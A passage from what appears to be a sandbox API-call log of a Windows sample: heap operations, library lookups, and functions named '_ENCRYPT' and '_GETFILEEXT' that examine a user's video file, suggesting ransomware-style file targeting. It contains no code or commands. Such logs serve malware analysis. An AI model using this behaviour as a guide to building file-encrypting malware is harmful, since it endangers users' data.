lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0199.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7e) returned 0x9c0c00 [0199.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=63, lpWideCharStr=0x9c0c00, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv") returned 63 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.675] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0199.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.677] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.677] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.678] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.679] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0199.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.679] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.679] CloseHandle (hObject=0x158) returned 1 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.680] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.680] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.681] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.681] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.681] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.681] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0x90add8 [0199.682] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.682] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 